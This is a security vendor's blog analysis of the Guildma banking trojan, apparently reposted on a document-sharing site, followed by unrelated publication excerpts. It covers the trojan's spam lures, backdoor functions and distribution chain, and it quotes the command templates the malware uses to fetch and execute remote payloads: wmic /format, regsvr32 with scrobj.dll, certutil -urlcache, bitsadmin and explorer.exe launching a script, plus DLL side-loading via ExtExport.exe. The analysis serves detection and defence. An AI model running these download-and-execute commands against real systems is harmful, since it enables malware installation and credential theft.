DOCSLIB.ORG

Guildma: the Devil Drives Electric | Welivesecurity

Total Page:16

File Type:pdf, Size:1020Kb

Download full-text PDF Read full-text
Guildma: the Devil Drives Electric | Welivesecurity 3/14/2020 Guildma: The Devil drives electric | WeLiveSecurity Guildma: The Devil drives electric welivesecurity.com/2020/03/05/guildma-devil-drives-electric March 5, 2020 In this blogpost, we will examine Guildma (also known as Astaroth, a powerful demon), a highly prevalent Latin American banking trojan. This Brazil-targeting trojan, written in Delphi, boasts some innovative execution and attack techniques. We will describe the most recent version, highlighting the most notable changes made since the middle of 2019 when an avalanche of articles about Guildma was published in response to its largest campaign to date. Characteristics Guildma is a Latin American banking trojan that targets Brazil exclusively. Based on our telemetry — as well as the public attention it has received — we believe it to be the most impactful and advanced banking trojan in the region. Besides targeting financial institutions, Guildma also attempts to steal credentials for email accounts, e‑shops and streaming services, and affects at least ten times as many victims as other Latin American banking trojans already described in this series. It uses innovative methods of execution and sophisticated attack techniques. Unlike the Latin American banking trojans we have described previously, Guildma does not store the fake pop-up windows it uses within the binary. Instead, the attack is orchestrated by its C&C server. This gives the authors greater flexibility to react to countermeasures implemented by the targeted banks. Guildma implements the following backdoor functionalities: Taking screenshots Capturing keystrokes Emulating keyboard and mouse Blocking shortcuts (such as disabling Alt + F4 to make it harder to get rid of fake windows it may display) Downloading and executing files Restarting the machine Guildma is very modular. At the time of writing, it consists of 10 modules, not including distribution chain stages. The functionality of individual modules will be discussed later. Evolution of distribution chains Our telemetry indicates Guildma spreads exclusively through spam emails with malicious attachments. Here are a few examples from a campaign from the middle of November 2019. https://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/ 1/18 3/14/2020 Guildma: The Devil drives electric | WeLiveSecurity Figure 1. Spam email example (translation: “Hello, please explain these photos to me. I’m waiting for your explanation!”) Figure 2. Spam email example (translation: “Dear member of consórcio, attached is the proof of bid no. 75432.”) https://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/ 2/18 3/14/2020 Guildma: The Devil drives electric | WeLiveSecurity Figure 3. Spam email example (translation: “Good morning, I am sending the proof of transfer – DOC. Citibank”) Figure 4. Spam email example. Fake invoice reminder stating that a payment is due the day after tomorrow and that the payment may take up to 72 hours to be processed. One of the defining characteristics of Guildma’s distribution chains is using tools already present on the system, often in new and unusual ways. https://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/ 3/18 3/14/2020 Guildma: The Devil drives electric | WeLiveSecurity Another characteristic is reusing techniques. New techniques are added every once in a while, but for the most part, the developers seem to simply reuse techniques from older versions. Figure 5. Distribution chain of Guildma in version 150 Figure 5 shows the distribution chain for version 150, but the structure of Guildma’s distribution chains is very dynamic. For instance, in previous versions, the malicious LNK file shown in Figure 5 was not embedded in a ZIP archive, or an SFX RAR archive containing an MSI installer was used instead. Also, there used to be another JScript stage whose sole purpose was downloading and executing the final JScript stage; there have been too many changes overall to fit into this article. In fact, the only part that has mostly stayed the same is the final JScript stage. Using data from our long-term, in-depth tracking of this family, we have compiled a very good picture of Guildma’s activity. Figure 6 shows all ESET detections of Guildma’s first-stage component. As you can see, the campaigns were ramping up slowly until a massive campaign in August 2019, when we were seeing up to 50,000 samples per day. This campaign went on for almost two months and accounted for more than double the amount of detections we had seen in the 10 months prior. Figure 6. First stage Guildma detections since October 2018 Following is a summary of some of the more interesting techniques used in the last 14 months. Execution of the JScript stage https://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/ 4/18 3/14/2020 Guildma: The Devil drives electric | WeLiveSecurity Over the last year, Guildma has used several methods of executing the JScript stages of its distribution chain. At the end of 2018, Guildma was hiding its code in eXtensible Stylesheet Language (.xsl) files and using wmic.exe to download and execute them: wmic.exe <wmic query> /format:”<URL>” It then briefly moved on to using regsvr32.exe and scrobj.dll to download a JScript-implemented COM object and execute its registration routine (which contained the malicious code): regsvr32.exe /s /n /u /i:<URL> scrobj.dll Most recently, the authors started abusing Windows Explorer to execute the JScript stage. This attack relies on the fact that Windows Explorer will try to open any file passed to it on the command line with its associated program and the fact that the default association for .js files is the Microsoft Windows Script Host. The “script” passed to Windows Explorer is a single command whose purpose is to download and execute the actual JScript stage: echo GetObject(‘script:<URL>’) > <file>.js | explorer.exe <random switches> <file>.js Execution of the binary modules Methods of running the PE modules are no less diverse. When we started tracking Guildma, it was abusing Avast’s aswRunDll.exe to launch the first binary stage, with regsvr32.exe as a failover for computers where Avast’s products weren’t installed. The use of aswRunDll.exe was then dropped, leaving regsvr32.exe as the sole method of execution. After a brief period of using rundll32.exe, Guildma switched to its current execution method — ExtExport.exe. ExtExport.exe is an undocumented component of Microsoft Internet Explorer used for exporting bookmarks from Mozilla Firefox and 360 Secure Browser, and can be abused for DLL Side- Loading. When the following command is executed, mozcrt19.dll, mozsqlite3.dll, and sqlite3.dll are loaded from the folder specified on the command line: C:\Program Files\Internet Explorer\ExtExport.exe <folder> <dummy 1> <dummy 2> To abuse this, you would normally drop the DLL to be loaded as one of the above-mentioned files; Guildma uses all three. Downloading the binary modules Guildma has also utilized a couple of different ways to download the binary modules. The first version was using certutil.exe copied to certis.exe (presumably to evade detection): certis.exe -urlcache -split -f “<URL>” “<destination path>” The authors then switched to BITSAdmin — the Microsoft Background Intelligent Transfer Service management tool — and are still using it at the time of writing: bitsadmin.exe /transfer <random number> /priority foreground <URL> <destination> https://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/ 5/18 3/14/2020 Guildma: The Devil drives electric | WeLiveSecurity For a couple months, the binary modules were base64-encoded and hosted on Google Cloud. In that time, Guildma was using both BITSAdmin and certutil — BITSAdmin to download the modules and certutil to decode them. Other changes Guildma uses strange, non-descriptive variable and function names. When we started tracking Guildma, the names, while nonsensical, were clearly man-made (e.g. “radador” for the random number function or “Bxaki” for the download function). In June 2019 they were all changed to random-looking names (e.g. “bx021” and “mrc430”). At first, we thought the authors implemented some kind of an automated script obfuscator, but it turned out to be a onetime change and the names have remained the same since. A relatively new addition is the age-old technique of using ADS (Alternate Data Streams) to store the binary modules. All the modules are now stored as ADS of a single file (e.g. “desktop.ini:nauwuygiaa.jpg”, “desktop.ini:nauwuygiab.jpg”, etc.). Version history Guildma has seemingly gone through many versions during its development, but there was usually very little development between versions — due to its clunky architecture utilizing hardcoded configuration values, for the most part the authors have to recompile all the binaries for every new campaign. A job that is clearly not completely automated, since there has often been a significant delay between updating the version number in the scripts and in the binaries. In this article, we cover version 150, but since we started writing, two more versions have been released. They contain no substantial change in functionality or distribution, supporting our claims about Guildma’s development cycle. The final stage of the distribution chain used to contain a version name (and even before that, it used to download said name along with the binary modules), but it has been (presumably) permanently replaced with a simple “xXx” since version 148. Table 1 summarizes all the versions released since we started tracking
Load more

Recommended publications
  • Tracking Users Across the Web Via TLS Session Resumption
    Tracking Users across the Web via TLS Session Resumption Erik Sy Christian Burkert University of Hamburg University of Hamburg Hannes Federrath Mathias Fischer University of Hamburg University of Hamburg ABSTRACT modes, and browser extensions to restrict tracking practices such as User tracking on the Internet can come in various forms, e.g., via HTTP cookies. Browser fingerprinting got more difficult, as trackers cookies or by fingerprinting web browsers. A technique that got can hardly distinguish the fingerprints of mobile browsers. They are less attention so far is user tracking based on TLS and specifically often not as unique as their counterparts on desktop systems [4, 12]. based on the TLS session resumption mechanism. To the best of Tracking based on IP addresses is restricted because of NAT that our knowledge, we are the first that investigate the applicability of causes users to share public IP addresses and it cannot track devices TLS session resumption for user tracking. For that, we evaluated across different networks. As a result, trackers have an increased the configuration of 48 popular browsers and one million of the interest in additional methods for regaining the visibility on the most popular websites. Moreover, we present a so-called prolon- browsing habits of users. The result is a race of arms between gation attack, which allows extending the tracking period beyond trackers as well as privacy-aware users and browser vendors. the lifetime of the session resumption mechanism. To show that One novel tracking technique could be based on TLS session re- under the observed browser configurations tracking via TLS session sumption, which allows abbreviating TLS handshakes by leveraging resumptions is feasible, we also looked into DNS data to understand key material exchanged in an earlier TLS session.
    [Show full text]
  • “Hidden Backdoor” in Qihoo 360 Secure Browser
    Independent Report on Alledged “Hidden Backdoor” in Qihoo 360 Secure Browser . IDF Laboratory Release Date: November 25, 2012 INTELLIGENCE DEFENSE FRIENDS LABORATORY http://www.idf.cn IDF Laboratory Version: <1.4> Independent Report on Alledged “Hidden Backdoor” in Qihoo 360 Date: <24/11/2012> Secure Browser Document Sign:IDF-REPDOC-20121124 Copyright Statement This research report is complied by IDF laboratory, unless it is published and agreed, its copyright belongs to IDF laboratory. While the quoted parts in the report belong to the original writer or corresponding units. Without the permission of IDF laboratory and the writer, any unit and individual are not allowed to transfer the contents of this report or use for other purpose, and this report is only for the reference of the industry research without commercial purposes. Welcome your criticism and correction. IDF Laboratory (Intelligence Defense Friends Laboratory) is a technical civil club for the enthusiasts of network information security, the backbone of which is made up of professionals, technicians and hobbyists from relevant fields. The research direction of IDF mainly focus on: the technical fields such as the development tendency of Internet threat, terminal security management, communication security of wireless network, botnet, as well as product research. IDF laboratory provides universal education of computer security knowledge for a great many enthusiasts of network information security, participates in the evaluation of the technology and market research for the products and development trends of relevant fields within the industry objectively and independently, thus providing the platform and bridge for the enthusiasts of network information security to be grow up as professional security or technical employees.
    [Show full text]
  • Attack Surface Analysis and Code Coverage Improvement for Fuzzing
    This document is downloaded from DR‑NTU (https://dr.ntu.edu.sg) Nanyang Technological University, Singapore. Attack surface analysis and code coverage improvement for fuzzing Peng, Lunan 2019 Peng, L. (2019). Attack surface analysis and code coverage improvement for fuzzing. Master's thesis, Nanyang Technological University, Singapore. https://hdl.handle.net/10356/105642 https://doi.org/10.32657/10356/105642 Downloaded on 07 Oct 2021 23:08:40 SGT Attack Surface Analysis and Code Coverage Improvement for Fuzzing PENG LUNAN School of Physical and Mathematical Sciences 2019 Attack Surface Analysis and Code Coverage Improvement for Fuzzing PENG LUNAN School of Physical and Mathematical Sciences A thesis submitted to the Nanyang Technological University in partial fulfillment of the requirements for the degree of Master of Science 2019 Supervisor Declaration Statement I have reviewed the content and presentation style of this thesis and declare it of sufficient grammatical clarity to be examined. To the best of my knowledge, the thesis is free of plagiarism and the research and writing are those of the candidate’s except as acknowledged in the Author Attribution Statement. I confirm that the investigations were conducted in accord with the ethics policies and integrity standards of Nanyang Technological University and that the research data are presented honestly and without prejudice. Date Wu Hongjun Abstract As cybercrime becoming a worldwide threat in the past decades, research on cyber- security keeps attracting a great deal of attention. During a long time competition between attackers and defenders, vulnerability detection has been considered as the decisive pre-step for both sides. Among the massive methodologies of vulnerability detection, fuzzing test has demonstrated its outstanding performance on finding bugs automatically and effectively.
    [Show full text]
  • China Tech Food Chain
    Information Technology / Asia ex Japan 15 November 2013 Standing out from the crowd China Tech Food Chain • We expect investors to focus on China smartphones, tablets, Positive (unchanged) components, and mobile Internet/services in 2014 Neutral • On our forecasts, smartphone and tablet shipments will grow by 43% and 42% YoY, respectively Negative • Our top stock picks for 2014 are: Mediatek, SK Hynix, Tencent, Lenovo and Sunny Optical How do we justify our view? See important disclosures, including any required research certifications, beginning on page 60 China Tech Food Chain 15 November 2013 Contents Standing out from the crowd in 2014 ..........................................................................................3 China Smartphone Sector ............................................................................................................ 5 China Tablet Sector ..................................................................................................................... 8 China Components Sector ......................................................................................................... 10 China Mobile Service/Internet sector ........................................................................................ 12 China smartphone supply chain directory ................................................................................. 15 Company Section AAC Technologies ................................................................................................................... 16 Lenovo
    [Show full text]
  • FOCUS: Shedding Light on the High Search Response Time in the Wild
    FOCUS: Shedding Light on the High Search Response Time in the Wild Dapeng Liu†, Youjian Zhao†, Kaixin Sui†, Lei Zou†, Dan Pei†⇤ , Qingqian Tao‡, Xiyang Chen‡, Dai Tan‡ †Tsinghua University †Tsinghua National Laboratory for Information Science and Technology (TNList) ‡Baidu Abstract—Response time plays a key role in Web services, as it 1) What are the HSRT conditions (the combinations of significantly impacts user engagement, and consequently the Web attributes and specific values in search logs which have providers’ revenue. Using a large search engine as a case study, a higher concentration of HSRT)? we propose a machine learning based analysis framework, called FOCUS, as the first step to automatically debug high search 2) Which HSRT condition types are prevalent across days? response time (HSRT) in search logs. The output of FOCUS offers 3) How does each attribute affect SRT in those prevalent a promising starting point for operators’ further investigation. HSRT condition types? FOCUS has been deployed in one of the largest search engines for 2.5 months and analyzed about one billion search logs. The answers to the above questions can offer a promising Compared with a previous approach, FOCUS generates 90% starting point to narrow down the HSRT debugging space to less items for investigation and achieves both higher recall and a few suspect attributes and specific values, based on which higher precision. The results of FOCUS enable us to make several further effective investigation can be done through taking interesting observations. For example, we find that popular advantage of additional data sources (beyond search logs) and queries are more image-intensive (e.g., TV series and shopping), but they have relatively low SRT because they are cached domain knowledge.
    [Show full text]
  • Security Evaluation of Multi-Factor Authentication in Comparison with the Web Authentication API
    Hochschule Wismar University of Applied Sciences Technology, Business and Design Faculty of Engineering, Department EE & CS Course of Studies: IT-Security and Forensics Master’s Thesis for the Attainment of the Academic Degree Master of Engineering (M. Eng.) Security Evaluation of Multi-Factor Authentication in Comparison with the Web Authentication API Submitted by: September 30, 2019 From: Tim Brust born xx/xx/xxxx in Hamburg, Germany Matriculation number: 246565 First supervisor: Prof. Dr.-Ing. habil. Andreas Ahrens Second supervisor: Prof. Dr. rer. nat. Nils Gruschka Purpose of This Thesis The purpose of this master’s thesis is an introduction to multi-factor authentication, as well as to the conventional methods of authentication (knowledge, possession, biometrics). This introduction includes technical functionality, web usability, and potential security threats and vulnerabilities. Further, this thesis will investigate whether the Web Authentication API is suit- able as an alternative or possible supplement to existing multi-factor authentication methods. The question has to be answered to what extent the Web Authentication API can increase security and user comfort. An evaluation of the security of the Web Authentication API in comparison with other multi-factor authentication solutions plays a crucial role in this thesis. Abstract Internet users are at constant risk, given that data breaches happen nearly daily. When a breached password is re-used, it renders their whole digital identity in dan- ger. To counter these threats, the user can deploy additional security measures, e.g., multi-factor authentication. This master’s thesis introduces and compares the multi- factor authentication solutions, one-time passwords, smart cards, security keys, and the Universal Second Factor protocol with a focus on their security.
    [Show full text]
  • Enhanced Performance and Privacy for Core Internet Protocols
    Enhanced Performance and Privacy for Core Internet Protocols Kumulative Dissertation zur Erlangung des akademischen Grades Dr. rer. nat. an der Fakultät für Mathematik, Informatik und Naturwissenschaften der Universität Hamburg eingereicht beim Fach-Promotionsausschuss Informatik von Erik Sy aus Pasewalk November 2019 Gutachter: Prof. Dr.-Ing. Hannes Federrath Prof. Dr-Ing. Claudia Diaz Tag der Disputation: 18. August 2020 Danksagung Diese Dissertation ist zwischen 2016 und 2019 am Arbeitsbereich Security and Privacy der Universität Hamburg entstanden. An dieser Stelle möchte ich mich bei allen bedanken, die zu ihrem Gelingen beigetragen haben. Besonderer Dank gilt meinem Doktorvater Hannes Federrath, der mich bei der Erstellung dieser Dissertation begleitet hat. Er hat mit mir die Zuversicht geteilt, dass ich nach meinem Studium der Physik erfolgreich in der IT-Sicherheit forschen werde. Mein Dank gilt ferner Christian Burkert, Mathias Fischer, Dominik Herrmann, Moritz Mön- nich, Tobias Müller, und Matthias Marx für die tolle Zusammenarbeit beim Verfassen von Forschungsbeiträgen. Ich bedanke mich auch bei meinen Kollegen die ich während meiner Promotionszeit kennen und schätzen gelernt habe: Maximilian Blochberger, Britta Böhm, Doganalp Ergenc, Steffen Haas, Malte Hamann, Stefanie Jasser, David Jost, Jens Lindemann, Sadaf Momeni, Johanna Nehring- Ansohn, Tom Petersen, Dimitra Pons, Henning Pridöhl, Eugen Ruppert, Monina Schwarz, Nurefsan Sertbas, Bahareh Shojaie, Marius Stübs, Florian Wilkens und Ephraim Zimmer. Schließlich bedanke ich mich bei meiner Familie, die mich nach Kräften unterstützt und bestärkt hat. Mein ganz besonderer Dank gilt meiner Partnerin Lisa und meinen Kindern Malou und Bela. Sie haben mich intensiv während des Entstehens dieser Arbeit begleitet und mich, immer wenn es nötig war, wieder auf andere Gedanken gebracht.
    [Show full text]
  • OPD Corso Base Di HTTP E HTML
    19/06/2019 OPD Corso base di HTTP e HTML Giancarlo Buzzanca (elaborazione da) [email protected] INFN – Sezione di Milano 2 Il protocollo HTTP (1/4) HTTP - HyperText Transfer Protocol È il protocollo principale che interconnette quella vastissima collezione di siti Internet nota come World Wide Web (WWW). Viene generalmente utilizzato per veicolare i documenti codificati in linguaggi di marcatura, per esempio l’HTML, ma permette anche il trasferimento di file e l’esecuzione di procedure via rete. Si basa sul protocollo TCP/IP (Internet Protocol) permettendo l’apertura di più connessioni contemporanee. Attualmente è il protocollo di alto livello di IP più usato in assoluto. 19/06/2019 3 Il protocollo HTTP (2/4) Consente l'accesso a documenti ipertestuali e multimediali in cui vengono realizzati dei link tra file di vario genere (non solo testuali) fisicamente residenti anche su host differenti. È gestito da un software, server HTTP (HTTPD), residente sugli host che intendono essere fornitori di informazioni. Per accedere alle informazioni fornite dal server HTTP si deve utilizzare un software client (Browser) in grado di interpretare le informazioni inviate dal server. HTTP è un protocollo "stateless": ad ogni richiesta si effettua una connessione al server che viene chiusa al termine del trasferimento dell'oggetto richiesto (pagina HTML, immagine, ecc.). 4 Il protocollo HTTP (3/4) HTTP è un protocollo "stateless Stateless significa che ogni richiesta è indipendente da quelle precedenti e si conclude al momento della chiusura della connessione (quando il server comunica che ha finito di servire il documento o premo "stop" nel browser).
    [Show full text]
  • 360 Browser Update CAB F2F48 @ Guangzhou
    360 Browser Update CAB F2F48 @ Guangzhou 2019.11.06 Halton Huo [email protected] 360Browser – The most popular browser in China 360 Extreme Browser 360 Secure Browser 360 Enterprise Browser MAU: 400M iResearch:Browser End User penetration rate in China DAU: 80M 2018Q3 2019Q3 90% 85% 81% 80%79% 80% 70% 60% 50% 40% 30% 23% 20% 20% 13%14% 14%13% 12%13% 12%13% 10% 8% 10% 5% 5% 0% 360 IE Chrome Sogou Firefox 2345 QQ UC Cheetah/Kingsoft PC browser remains internet entrance Browser user daily active map Internet Traffic (Mobile vs PC) Source:BroadbandSearch Source:360 • PC still eat 50% internet traffic , and browser is >50% for daily use • PC browser users are mainly on OFFICE work scenarios HTTP->HTTPS Status in China HTTPS vs HTTP visits by County 120% HTTPS HTTP 100% • HTTPS percentage in China relative low 8% 10% 11% 15% 17% 19% 20% (65%) compared with US/EU and other 33% 80% golden bricks countries. • HTTPS in China gov websites is 47%[1], 60% while US gov websites are 100%[2] 92% 90% 89% 85% 40% 83% 81% 80% 67% [1] Based on 111,529 government websites by 360, July 2019 20% [2] Benefits from white house“HTTPS-Only”directive in June 2015 0% US Germany France Russia Brazil Japan India China Source: https://transparencyreport.google.com/https/overview (expect China) and 360 (China) 360 Root Store updates CA Roots Status iTrusChina • vTrus Root CA Added after Sept. 1 • vTrus ECC Root CA releases CFCA • CFCA EV ROOT To be released HARICA • Hellenic Academic and Research Institutions To be released RootCA 2015 • Hellenic Academic and Research
    [Show full text]
  • 12-Key Network Remote Pad VPK312 User Manual
    12-key Network Remote Pad VPK312 User Manual www.aten.com VPK312 User Manual EMC Information FEDERAL COMMUNICATIONS COMMISSION INTERFERENCE STATEMENT: This equipment has been tested and found to comply with the limits for a Class A digital device, pursuant to Part 15 of the FCC Rules. These limits are designed to provide reasonable protection against harmful interference when the equipment is operated in a commercial environment. This equipment generates, uses, and can radiate radio frequency energy and, if not installed and used in accordance with the instruction manual, may cause harmful interference to radio communications. Operation of this equipment in a residential area is likely to cause harmful interference in which case the user will be required to correct the interference at his own expense. FCC Caution: Any changes or modifications not expressly approved by the party responsible for compliance could void the user's authority to operate this equipment. CE Warning: Operation of this equipment in a residential environment could cause radio interference. This device complies with Part 15 of the FCC Rules. Operation is subject to the following two conditions: (1) this device may not cause harmful interference, and (2) this device must accept any interference received, including interference that may cause undesired operation. Suggestion: Shielded twisted pair (STP) cables must be used with the unit to ensure compliance with FCC & CE standards. Achtung: Der Gebrauch dieses Geräts in Wohnumgebung kann Funkstörungen verursachen. RoHS
    [Show full text]
  • Automatic Tracking of Personally Identifiable Information in Windows Meisam Navaki Arefi Geoffrey Alexander Jedidiah R
    PIITracker: Automatic Tracking of Personally Identifiable Information in Windows Meisam Navaki Arefi Geoffrey Alexander Jedidiah R. Crandall University of New Mexico University of New Mexico University of New Mexico Albuquerque, New Mexico, USA Albuquerque, New Mexico, USA Albuquerque, New Mexico, USA [email protected] [email protected] [email protected] ABSTRACT the network. PIITracker is based on dynamic information flow Personally Identifiable Information (PII) is information that tracking (DIFT) [29], also known as Dynamic Taint Analysis [22], can be used on its own or with other information to distinguish which is a promising technology for making systems transparent. It or trace an individual’s identity. To investigate an application for works by tagging certain inputs or data with meta information and PII tracking, a reverse engineer has to put considerable effort to then propagating tags as the program or system runs, usually at the reverse engineer an application and discover what an application instruction level, so that the transparency of the flow of information does with PII. To automate this process and save reverse engineers can be achieved. substantial time and effort, we propose PIITracker which is anew The PII that we have investigated in this paper are (1) MAC and novel tool that can track PII automatically and capture if any address, (2) hard drive serial number, (3) hard drive model name, processes are sending PII over the network. This is made possible by (4) volume serial number, (5) host name, (6) computer name, (7) 1) whole-system dynamic information flow tracking 2) monitoring security identifier number (SID), (8) CPU model, and (9) Windows specific function and system calls.
    [Show full text]
  • The Reverse Merger in China: the Qihoo 360 Story
    The Reverse Merger in China: the Qihoo 360 Story gwbflr.org/the-reverse-merger-in-china-the-qihoo-360-story/ Thomas Gross May 21, 2019 By Thomas P. Gross & Chenxi Liu The blank check/reverse merger mechanism is a well-known process in the United States for taking a privately held company to the public exchanges without a full section 5 review by the Securities and Exchange Commission (the “SEC”). Regulated by SEC Rule 419,[1] the SEC allows companies with virtually no assets and no stated business purpose —other than to acquire or merge with other companies—to file a section 5 application “to go public” in order to raise funds for those acquisitions. Specifically, as defined in Rule 419(a),[2] a blank check company is a company that “is a development stage company that has no specific business plan or purpose or has indicated that its business plan is to engage in a merger or acquisition with an unidentified company or companies, or other entity or person.” In essence, it is a publicly traded company with no hard assets, virtually no employees, and a vague business plan to merge or acquire another company. With virtually nothing to disclose, it is difficult for the SEC to review the application for full disclosure requirements, and also difficult for investors to determine whether the business plan and targeted company would fit the risk-return characteristics of their investment portfolio. Various provisions in Rule 419 provide notice and disclosure requirements to the investors so they may opt-in once a target company has been identified if they decide the disclosed acquisition/merger fits their investment objectives.
    [Show full text]